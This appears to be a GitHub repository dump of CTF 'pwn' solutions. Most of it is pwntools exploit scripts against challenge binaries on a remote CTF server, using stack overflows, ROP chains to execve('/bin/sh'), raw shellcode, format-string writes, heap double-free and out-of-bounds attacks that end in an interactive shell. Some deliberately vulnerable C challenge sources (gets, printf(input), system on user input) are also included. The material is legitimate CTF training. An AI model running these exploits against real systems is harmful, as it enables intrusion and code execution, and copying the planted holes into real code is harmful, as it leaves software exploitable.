├── .gitignore ├── Angelboy_Pwn-1 ├── bofe4sy └── hack.py ├── Angelboy_Pwn-2 ├── hack.py └── ret2sc ├── Angelboy_Pwn-3 ├── hack.py └── r3t2lib ├── Angelboy_Pwn-4 ├── hack.py └── simplerop_revenge ├── Angelboy_Pwn-5 ├── hack.py └── ret2plt ├── Angelboy_Pwn-6 ├── hack.py └── simplerop ├── LICENSE ├── README.md ├── baby_fmt ├── baby_fmt └── hack.py ├── baby_heap ├── baby_heap └── hack.py ├── echo_server ├── echo_server ├── echo_server.c └── hack.py ├── fmt-1 ├── fmt-1 └── hack.py ├── fmt-2 ├── fmt-2 └── hack.py ├── fmt-3 ├── fmt-3 └── hack.py ├── fmtstr ├── fmtstr ├── fmtstr.c └── hack.py ├── forging_chunk ├── forging_chunk ├── forging_chunk.c └── hack.py ├── gohome ├── gohome ├── gohome.c └── hack.py ├── math_teacher └── hack.py ├── oob1-sean_Pwn-1 ├── hack.py └── oob1 ├── oob2-sean_Pwn-2 ├── hack.py └── oob2 ├── oob3-sean_Pwn-3 ├── hack.py └── oob3 ├── oob4-sean_Pwn-4 ├── hack.py └── oob4 ├── oob5-sean_Pwn-5 ├── hack.py └── oob5 ├── pass ├── hack.py ├── pass └── pass.c ├── printable ├── hack.py └── printable ├── registration ├── hack.py ├── registration └── registration.c ├── ret2src ├── hack.py ├── ret2src └── ret2src.c ├── rop0-sean_Pwn-1 ├── hack.py └── rop0 ├── rop1-sean_Pwn-2 ├── hack.py └── rop1 ├── rop2-sean_Pwn-3 ├── hack.py └── rop2 ├── secret ├── hack.py ├── secret └── secret.c ├── snowman ├── hack.py ├── snowman ├── snowman.c └── snowman.py ├── tcache ├── hack.py └── tcache ├── uaf ├── hack.py └── uaf ├── unlink ├── hack.py ├── unlink └── unlink.c ├── 張元_Pwn-1 ├── hack.py └── luck ├── 張元_Pwn-10 ├── hack.py └── plt ├── 張元_Pwn-3 ├── hack.py └── rop ├── 張元_Pwn-6 ├── hack.py └── pwntools ├── 張元_Pwn-7 ├── binary └── hack.py ├── 張元_Pwn-8 ├── hack.py └── return └── 張元_Pwn-9 ├── hack.py └── shellcode /.gitignore: -------------------------------------------------------------------------------- 1 | core 2 | .gdb_history 3 | peda-session-* 4 | 5 | # Byte-compiled / optimized / DLL files 6 | __pycache__/ 7 | *.py[cod] 8 | *$py.class 9 | 10 | # C extensions 11 | *.so 12 | 13 | # Distribution / packaging 14 | .Python 15 | build/ 16 | develop-eggs/ 17 | dist/ 18 | downloads/ 19 | eggs/ 20 | .eggs/ 21 | lib/ 22 | lib64/ 23 | parts/ 24 | sdist/ 25 | var/ 26 | wheels/ 27 | pip-wheel-metadata/ 28 | share/python-wheels/ 29 | *.egg-info/ 30 | .installed.cfg 31 | *.egg 32 | MANIFEST 33 | 34 | # PyInstaller 35 | # Usually these files are written by a python script from a template 36 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 37 | *.manifest 38 | *.spec 39 | 40 | # Installer logs 41 | pip-log.txt 42 | pip-delete-this-directory.txt 43 | 44 | # Unit test / coverage reports 45 | htmlcov/ 46 | .tox/ 47 | .nox/ 48 | .coverage 49 | .coverage.* 50 | .cache 51 | nosetests.xml 52 | coverage.xml 53 | *.cover 54 | *.py,cover 55 | .hypothesis/ 56 | .pytest_cache/ 57 | 58 | # Translations 59 | *.mo 60 | *.pot 61 | 62 | # Django stuff: 63 | *.log 64 | local_settings.py 65 | db.sqlite3 66 | db.sqlite3-journal 67 | 68 | # Flask stuff: 69 | instance/ 70 | .webassets-cache 71 | 72 | # Scrapy stuff: 73 | .scrapy 74 | 75 | # Sphinx documentation 76 | docs/_build/ 77 | 78 | # PyBuilder 79 | target/ 80 | 81 | # Jupyter Notebook 82 | .ipynb_checkpoints 83 | 84 | # IPython 85 | profile_default/ 86 | ipython_config.py 87 | 88 | # pyenv 89 | .python-version 90 | 91 | # pipenv 92 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 93 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 94 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 95 | # install all needed dependencies. 96 | #Pipfile.lock 97 | 98 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 99 | __pypackages__/ 100 | 101 | # Celery stuff 102 | celerybeat-schedule 103 | celerybeat.pid 104 | 105 | # SageMath parsed files 106 | *.sage.py 107 | 108 | # Environments 109 | .env 110 | .venv 111 | env/ 112 | venv/ 113 | ENV/ 114 | env.bak/ 115 | venv.bak/ 116 | 117 | # Spyder project settings 118 | .spyderproject 119 | .spyproject 120 | 121 | # Rope project settings 122 | .ropeproject 123 | 124 | # mkdocs documentation 125 | /site 126 | 127 | # mypy 128 | .mypy_cache/ 129 | .dmypy.json 130 | dmypy.json 131 | 132 | # Pyre type checker 133 | .pyre/ 134 | -------------------------------------------------------------------------------- /Angelboy_Pwn-1/bofe4sy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/Angelboy_Pwn-1/bofe4sy -------------------------------------------------------------------------------- /Angelboy_Pwn-1/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = "amd64" 4 | 5 | ip = "140.110.112.77" 6 | port = 2121 7 | 8 | context.arch = "amd64" 9 | 10 | r = remote(ip, port) 11 | # r = process("./bofe4sy") 12 | 13 | ret = 0x4004c1 14 | win = 0x400646 15 | 16 | r.sendline(flat('a' * 40, ret, win)) 17 | 18 | r.interactive() 19 | -------------------------------------------------------------------------------- /Angelboy_Pwn-2/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = "amd64" 4 | 5 | ip = "140.110.112.77" 6 | port = 2122 7 | 8 | context.arch = "amd64" 9 | 10 | r = remote(ip, port) 11 | # r = process("./ret2sc") 12 | 13 | name = 0x601080 14 | shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 15 | 16 | r.sendafter(':', shellcode) 17 | r.sendlineafter(':', flat('a' * 40, name)) 18 | 19 | r.interactive() 20 | -------------------------------------------------------------------------------- /Angelboy_Pwn-2/ret2sc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/Angelboy_Pwn-2/ret2sc -------------------------------------------------------------------------------- /Angelboy_Pwn-3/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = "amd64" 4 | 5 | ip = "140.110.112.77" 6 | port = 2123 7 | 8 | r = remote(ip, port) 9 | # r = process("./r3t2lib") 10 | 11 | main = 0x4006f6 12 | puts_got = 0x601018 13 | libc_start_got = 0x601030 14 | puts_off = 0x06f690 15 | 16 | r.sendlineafter(':', hex(puts_got)) 17 | r.recvuntil(':') 18 | libc = int(r.recvline().strip(), 16) - puts_off 19 | log.info(hex(libc)) 20 | 21 | ''' 22 | r.sendlineafter(':', 'a' * 280 + p64(main)) 23 | r.sendlineafter(':', hex(libc_start_got)) 24 | ''' 25 | 26 | win = libc + 0x45216 27 | r.sendlineafter(':', b'a' * 280 + p64(win)) 28 | 29 | r.interactive() 30 | -------------------------------------------------------------------------------- /Angelboy_Pwn-3/r3t2lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/Angelboy_Pwn-3/r3t2lib -------------------------------------------------------------------------------- /Angelboy_Pwn-4/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | context.arch = "amd64" 5 | 6 | ip = "140.110.112.77" 7 | port = 2124 8 | 9 | r = remote(ip, port) 10 | # r = process("./simplerop_revenge") 11 | 12 | main = 0x40093d 13 | data = 0x6cc000 - 0x100 14 | read = 0x43F3B0 15 | pop_rsi = 0x401577 16 | pop_rax_rdx_rbx = 0x478516 17 | pop_rdi = 0x401456 18 | syscall = 0x4671b5 19 | 20 | r.sendlineafter(':', b'a' * 40 + flat(pop_rsi, data, read, main)) 21 | time.sleep(0.1) 22 | r.send('/bin/sh') 23 | r.sendlineafter(':', b'a' * 40 + flat(pop_rax_rdx_rbx, 0x3b, 0, 0, pop_rdi, data, pop_rsi, 0, syscall)) 24 | 25 | r.interactive() 26 | -------------------------------------------------------------------------------- /Angelboy_Pwn-4/simplerop_revenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/Angelboy_Pwn-4/simplerop_revenge -------------------------------------------------------------------------------- /Angelboy_Pwn-5/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | context.arch = "amd64" 5 | 6 | ip = "140.110.112.77" 7 | port = 2125 8 | 9 | r = remote(ip, port) 10 | # r = process("./ret2plt") 11 | 12 | main = 0x400636 13 | printf_got = 0x601020 14 | libc_start_got = 0x601028 15 | puts_plt = 0x4004e0 16 | pop_rdi = 0x4006f3 17 | 18 | r.sendlineafter(':', b'a' * 40 + flat(pop_rdi, libc_start_got, puts_plt, main)) 19 | r.recvline() 20 | libc = u64(r.recv()[:6].ljust(8, b'\x00')) - 0x020740 21 | log.info(hex(libc)) 22 | 23 | magic = libc + 0x45216 24 | time.sleep(0.1) 25 | r.sendline(b'a' * 40 + flat(magic)) 26 | 27 | r.interactive() 28 | -------------------------------------------------------------------------------- /Angelboy_Pwn-5/ret2plt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/Angelboy_Pwn-5/ret2plt -------------------------------------------------------------------------------- /Angelboy_Pwn-6/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | ip = "140.110.112.77" 5 | port = 2126 6 | 7 | r = remote(ip, port) 8 | # r = process("./simplerop") 9 | 10 | main = 0x8048e24 11 | data = 0x80eb000 - 0x100 12 | read = 0x806CD50 13 | pop_eax = 0x80bae06 14 | pop_ecx_ebx = 0x806e851 15 | pop_edx = 0x806e82a 16 | syscall = 0x80493e1 17 | 18 | r.sendlineafter(':', b'a' * 32 + flat(read, main, 0, data, 0x100)) 19 | time.sleep(0.1) 20 | r.send('/bin/sh\x00') 21 | r.sendlineafter(':', b'a' * 24 + flat(pop_eax, 11, pop_ecx_ebx, 0, data, pop_edx, 0, syscall)) 22 | 23 | r.interactive() 24 | -------------------------------------------------------------------------------- /Angelboy_Pwn-6/simplerop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/Angelboy_Pwn-6/simplerop -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Si Chen Lin 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Pwn-CTF-writeups -------------------------------------------------------------------------------- /baby_fmt/baby_fmt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/baby_fmt/baby_fmt -------------------------------------------------------------------------------- /baby_fmt/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 4001 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./baby_fmt") 10 | 11 | payload = ".".join([f"%{x}$p" for x in range(6, 11)]) 12 | r.sendlineafter(":D", payload) 13 | 14 | r.recvuntil(":") 15 | flag = list(map(lambda x: int(x, 16), r.recvline()[:-1].split(b"."))) 16 | print(b"".join(list(map(lambda x: int.to_bytes(x, 8, 'little'), flag)))) 17 | 18 | r.interactive() 19 | -------------------------------------------------------------------------------- /baby_heap/baby_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/baby_heap/baby_heap -------------------------------------------------------------------------------- /baby_heap/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 4008 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./baby_heap") 10 | 11 | Libc = ELF("./libc-2.23.so") 12 | 13 | def Add(sz, data): 14 | r.sendlineafter(">", "1") 15 | r.sendlineafter(":", str(sz)) 16 | r.sendlineafter(":", data) 17 | 18 | def Show(idx): 19 | r.sendlineafter(">", "2") 20 | r.sendlineafter(":", str(idx)) 21 | 22 | def Delete(idx): 23 | r.sendlineafter(">", "3") 24 | r.sendlineafter(":", str(idx)) 25 | 26 | Add(0x60, "aaaa") 27 | Add(0x400, "bbbb") 28 | Add(0x60, "cccc") 29 | Delete(1) 30 | Show(1) 31 | 32 | libc = u64(r.recvline()[:-1].ljust(8, b'\x00')) - 0x3c4b78 33 | Libc.address = libc 34 | log.info(hex(libc)) 35 | 36 | Delete(0) 37 | Delete(2) 38 | Delete(0) 39 | 40 | Add(0x60, p64(Libc.sym["__malloc_hook"] - 0x23)) 41 | Add(0x60, "dddd") 42 | Add(0x60, "eeee") 43 | Add(0x60, b"\x00" * 0x13 + p64(libc + 0xf02a4)) 44 | 45 | Delete(0) 46 | Delete(0) 47 | 48 | r.interactive() 49 | -------------------------------------------------------------------------------- /echo_server/echo_server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/echo_server/echo_server -------------------------------------------------------------------------------- /echo_server/echo_server.c: -------------------------------------------------------------------------------- 1 | #include"stdio.h" 2 | #include"stdlib.h" 3 | #include"string.h" 4 | 5 | char cmd[128]; 6 | 7 | void runCMD(){ 8 | system(cmd); 9 | return; 10 | } 11 | 12 | void getString(){ 13 | char input[32] = {0}; 14 | for(int i=0; i<128; i++)cmd[i] = 0; 15 | printf("> "); 16 | gets(input); 17 | strcat(cmd, "echo \'"); 18 | for(int i=0, j=6; i<32; i++){ 19 | if(input[i] == '\''){ 20 | strcat(cmd, "\'\\\'\'"); 21 | j += 4; 22 | }else{ 23 | cmd[j] = input[i]; 24 | j++; 25 | } 26 | } 27 | strcat(cmd, "\'"); 28 | return; 29 | } 30 | 31 | int main(){ 32 | setvbuf(stdout, 0, 2, 0); 33 | setvbuf(stdin, 0, 2, 0); 34 | 35 | printf("========= echo server =========\n"); 36 | printf("This is an echo server.\n"); 37 | printf("It will echo whatever you type.\n"); 38 | printf("But not something like:\n"); 39 | printf("/bin/sh\n"); 40 | printf("cat /home/ctf/flag\n"); 41 | printf("===============================\n"); 42 | 43 | while(1){ 44 | getString(); 45 | runCMD(); 46 | } 47 | 48 | return 0; 49 | } 50 | -------------------------------------------------------------------------------- /echo_server/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 6129 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./echo_server") 10 | 11 | binsh = 0x6009c0 12 | system = 0x400570 13 | pop_rdi = 0x400923 14 | ret = pop_rdi + 1 15 | 16 | payload = b"" 17 | payload += b"a" * 56 18 | payload += flat(pop_rdi, binsh, ret, system) 19 | 20 | r.sendlineafter(">", payload) 21 | 22 | r.interactive() 23 | -------------------------------------------------------------------------------- /fmt-1/fmt-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/fmt-1/fmt-1 -------------------------------------------------------------------------------- /fmt-1/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 4002 5 | 6 | r = remote(ip, port) 7 | # r = process("./fmt-1") 8 | 9 | context.arch = "amd64" 10 | 11 | secret = 0x404050 12 | 13 | payload = b"%256c%10$hhn".ljust(0x10) + flat(secret) 14 | 15 | r.sendafter(":", payload) 16 | r.sendafter(":", "\x00") 17 | 18 | r.interactive() 19 | -------------------------------------------------------------------------------- /fmt-2/fmt-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/fmt-2/fmt-2 -------------------------------------------------------------------------------- /fmt-2/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 4003 5 | 6 | r = remote(ip, port) 7 | # r = process("./fmt-2") 8 | 9 | context.arch = "amd64" 10 | 11 | magic = 0x404050 12 | length = 0x48 13 | target = 0xfaceb00c 14 | 15 | payload = b"" 16 | 17 | idx = 13 18 | pre = 0 19 | for i in range(2): 20 | val = (target & 0xffff) - pre 21 | target >>= 16 22 | val %= 65536 23 | if val == 0: 24 | val = 65536 25 | pre = val 26 | payload += f"%{val}c%{idx + i}$hn".encode() 27 | 28 | payload = payload.ljust(length - 0x10) + flat([magic + i * 2 for i in range(2)]) 29 | 30 | r.sendafter(":", payload) 31 | 32 | r.interactive() 33 | -------------------------------------------------------------------------------- /fmt-3/fmt-3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/fmt-3/fmt-3 -------------------------------------------------------------------------------- /fmt-3/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | ip = "140.110.112.77" 5 | port = 4004 6 | 7 | r = remote(ip, port) 8 | # r = process("./fmt-3") 9 | 10 | Libc = ELF("./libc-2.27.so") 11 | 12 | context.arch = "amd64" 13 | # context.log_level = "debug" 14 | 15 | main = 0x4011b3 16 | exit_got = 0x404030 17 | 18 | payload = b"%11$p.%4516c%9$hn".ljust(0x18, b'a') 19 | payload += flat(exit_got) 20 | 21 | r.sendline(payload) 22 | 23 | libc = int(r.recvuntil(".")[:-1], 16) - 0x3f3660 24 | log.info(hex(libc)) 25 | Libc.address = libc 26 | 27 | malloc_hook = Libc.sym["__malloc_hook"] 28 | win = libc + 0x4f322 29 | 30 | for i in range(8): 31 | val = win & 0xff 32 | win >>= 8 33 | val %= 256 34 | if val == 0: 35 | val = 256 36 | payload = b"%{}c%9$hhn".format(val).ljust(0x18, b'a') 37 | payload += flat(malloc_hook + i) 38 | r.sendline(payload) 39 | time.sleep(0.1) 40 | 41 | r.sendline("%65536c") 42 | 43 | r.interactive() 44 | -------------------------------------------------------------------------------- /fmtstr/fmtstr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/fmtstr/fmtstr -------------------------------------------------------------------------------- /fmtstr/fmtstr.c: -------------------------------------------------------------------------------- 1 | #include"stdio.h" 2 | #include"stdlib.h" 3 | 4 | int main(){ 5 | setvbuf(stdout, 0, 2, 0); 6 | setvbuf(stdin, 0, 2, 0); 7 | 8 | char flag[56] = "MyFirstCTF{??????????????????????????????????????????????}"; 9 | char input[40]; 10 | 11 | scanf("%s", input); 12 | printf(input); 13 | 14 | return 0; 15 | } 16 | -------------------------------------------------------------------------------- /fmtstr/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 6127 5 | 6 | r = remote(ip, port) 7 | # r = process("./fmtstr") 8 | 9 | payload = "" 10 | 11 | for i in range(12, 19): 12 | payload += "%{}$p.".format(i) 13 | 14 | r.sendline(payload) 15 | out = r.recv() 16 | flag = b"" 17 | 18 | for i in out.split(b"."): 19 | try: 20 | flag += p64(int(i, 16)) 21 | except: 22 | continue 23 | 24 | print(flag) 25 | 26 | r.interactive() 27 | -------------------------------------------------------------------------------- /forging_chunk/forging_chunk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/forging_chunk/forging_chunk -------------------------------------------------------------------------------- /forging_chunk/forging_chunk.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | int input(); 7 | 8 | 9 | int main(int argc, char *argv[]) 10 | { 11 | int select; 12 | unsigned long long size = 0x20; 13 | unsigned long long victim; 14 | char *ary[4]; 15 | setvbuf(stdout, NULL, _IONBF, 0); 16 | printf("victim's address:%p\n", &victim); 17 | printf("size's address:%p\n", &size); 18 | printf("(0)free\n(1)malloc\n(2)write\n(3)show\ninput: "); 19 | while((select = input()) != EOF) 20 | { 21 | if(select == 1) // x = malloc 22 | { 23 | printf("ary[x] = malloc(8) // (0 <= x <= 3)\nx = "); 24 | if((select = input()) != EOF) ary[select] = (char *) malloc(8); 25 | else printf("invalid number\n"); 26 | printf("adr:%p\n", ary[select]); 27 | } 28 | else if(select == 0) // free(x) 29 | { 30 | printf("free(ary[x]) // (0 <= x <= 3)\nx = "); 31 | if((select = input()) != EOF) free(ary[select]); 32 | else printf("invalid number\n"); 33 | } 34 | else if(select == 2) // x = string 35 | { 36 | char *p; 37 | printf("*ary[x] = string // (0 <= x <= 3)\nx = "); 38 | while((select = input()) == EOF) 39 | { 40 | printf("invalid number\n"); 41 | printf("*ary[x] = string // (0 <= x <= 3)\nx = "); 42 | } 43 | p = ary[select]; 44 | printf("string = "); 45 | scanf("%s", p); 46 | } 47 | else if(select == 3) // show x 48 | { 49 | printf("print *ary[x] // (0 <= x <= 3)\nx = "); 50 | if((select = input()) != EOF) printf("your string:\n%s\n", ary[select]); 51 | else printf("invalid number\n"); 52 | } 53 | printf("(0)free\n(1)malloc\n(2)write\n(3)show\ninput: "); 54 | } 55 | 56 | if(victim == 0xdeadbeef) 57 | { 58 | system("cat flag.txt"); 59 | } 60 | printf("Goodbye!\n"); 61 | return 0; 62 | } 63 | 64 | 65 | int input() 66 | { 67 | int select; 68 | if(scanf("%d", &select) != EOF) 69 | { 70 | return (select >= 0 && select <= 3) ? select : EOF; 71 | } 72 | else 73 | { 74 | return EOF; 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /forging_chunk/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 9001 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./forging_chunk") 10 | 11 | def Free(idx): 12 | r.sendlineafter(":", "0") 13 | r.sendlineafter("x = ", str(idx)) 14 | 15 | def Malloc(idx): 16 | r.sendlineafter(":", "1") 17 | r.sendlineafter("x = ", str(idx)) 18 | r.recvuntil(":") 19 | return int(r.recvline()[:-1], 16) 20 | 21 | def Write(idx, data): 22 | r.sendlineafter(":", "2") 23 | r.sendlineafter("x = ", str(idx)) 24 | r.sendlineafter("=", data) 25 | 26 | r.recvuntil(":") 27 | victim = int(r.recvline()[:-1], 16) 28 | log.info(hex(victim)) 29 | r.recvuntil(":") 30 | sz = int(r.recvline()[:-1], 16) 31 | 32 | Malloc(0) 33 | Malloc(1) 34 | Free(0) 35 | Free(1) 36 | 37 | Write(1, p64(sz - 0x8)) 38 | Malloc(0) 39 | Malloc(1) 40 | 41 | Write(1, p64(0xdeadbeef)) 42 | r.sendlineafter(":", "87") 43 | 44 | r.interactive() 45 | -------------------------------------------------------------------------------- /gohome/gohome: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/gohome/gohome -------------------------------------------------------------------------------- /gohome/gohome.c: -------------------------------------------------------------------------------- 1 | #include"stdio.h" 2 | #include"stdlib.h" 3 | 4 | void Billyshouse(){ 5 | system("cat /home/ctf/flag"); 6 | } 7 | 8 | int main(){ 9 | setvbuf(stdout, 0, 2, 0); 10 | setvbuf(stdin, 0, 2, 0); 11 | 12 | char address[32]; 13 | 14 | printf("Billy want to go home now.\n"); 15 | printf("Do you know the address of his house ?"); 16 | 17 | gets(address); 18 | 19 | return 0; 20 | } 21 | -------------------------------------------------------------------------------- /gohome/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 6126 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./gohome") 10 | 11 | ret = 0x400541 12 | win = 0x4006c6 13 | 14 | r.sendlineafter("?", flat("a" * 40, ret, win)) 15 | 16 | r.interactive() 17 | -------------------------------------------------------------------------------- /math_teacher/hack.py: -------------------------------------------------------------------------------- 1 | from z3 import * 2 | from pwn import * 3 | 4 | ip = "140.110.112.77" 5 | port = 9003 6 | 7 | r = remote(ip, port) 8 | 9 | while True: 10 | x = Int('x') 11 | y = Int('y') 12 | s = Solver() 13 | for _ in range(2): 14 | eq = r.recvline().replace(b"=", b"==") 15 | if b"=" not in eq: 16 | print(eq) 17 | else: 18 | s.add(eval(eq)) 19 | if s.check() == sat: 20 | m = s.model() 21 | r.sendlineafter("=", str(m[x])) 22 | r.sendlineafter("=", str(m[y])) 23 | 24 | r.interactive() 25 | -------------------------------------------------------------------------------- /oob1-sean_Pwn-1/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 3111 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./oob1") 10 | 11 | r.sendlineafter(":", "-4") 12 | r.sendlineafter(":", "1234") 13 | 14 | r.recvuntil("[") 15 | pin = u32(r.recvuntil("]")[:-1][:4].ljust(4, b'\x00')) 16 | 17 | r.sendlineafter(":", "0") 18 | r.sendlineafter(":", str(pin)) 19 | 20 | r.interactive() 21 | -------------------------------------------------------------------------------- /oob1-sean_Pwn-1/oob1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/oob1-sean_Pwn-1/oob1 -------------------------------------------------------------------------------- /oob2-sean_Pwn-2/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 3112 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./oob2") 10 | 11 | r.sendlineafter(":", "-4") 12 | r.sendlineafter(":", p64(0xdeadbeef)) 13 | r.sendlineafter(":", "1234") 14 | 15 | r.sendlineafter(":", "0") 16 | r.sendlineafter(":", "admin") 17 | r.sendlineafter(":", str(0xdead0000)) 18 | 19 | r.interactive() 20 | -------------------------------------------------------------------------------- /oob2-sean_Pwn-2/oob2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/oob2-sean_Pwn-2/oob2 -------------------------------------------------------------------------------- /oob3-sean_Pwn-3/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 3113 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./oob3") 10 | 11 | win = 0x400924 12 | 13 | r.sendlineafter(":", "-17") 14 | r.sendlineafter(":", p64(win)) 15 | 16 | r.interactive() 17 | -------------------------------------------------------------------------------- /oob3-sean_Pwn-3/oob3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/oob3-sean_Pwn-3/oob3 -------------------------------------------------------------------------------- /oob4-sean_Pwn-4/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 3114 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./oob4") 10 | 11 | win = 0x4007E6 12 | 13 | r.sendlineafter(":", "-5") 14 | r.sendlineafter(":", p64(win)) 15 | 16 | r.interactive() 17 | -------------------------------------------------------------------------------- /oob4-sean_Pwn-4/oob4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5teven1in/Pwn-CTF-writeups/930a85169c2110594479cf66528b79e8ddae46a2/oob4-sean_Pwn-4/oob4 -------------------------------------------------------------------------------- /oob5-sean_Pwn-5/hack.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ip = "140.110.112.77" 4 | port = 3115 5 | 6 | context.arch = "amd64" 7 | 8 | r = remote(ip, port) 9 | # r = process("./oob5") 10 | 11 | user = 0x601040 12 | win = 0x4007B6 13 | 14 | r.recvuntil("=") 15 | stack = int(r.recvline()[:-1], 16) 16 | log.info(hex(stack)) 17 | 18 | offset = (stack - 0x18 - user) // 8 19 | r.sendlineafter(":", str(offset)) 20 | 21 | 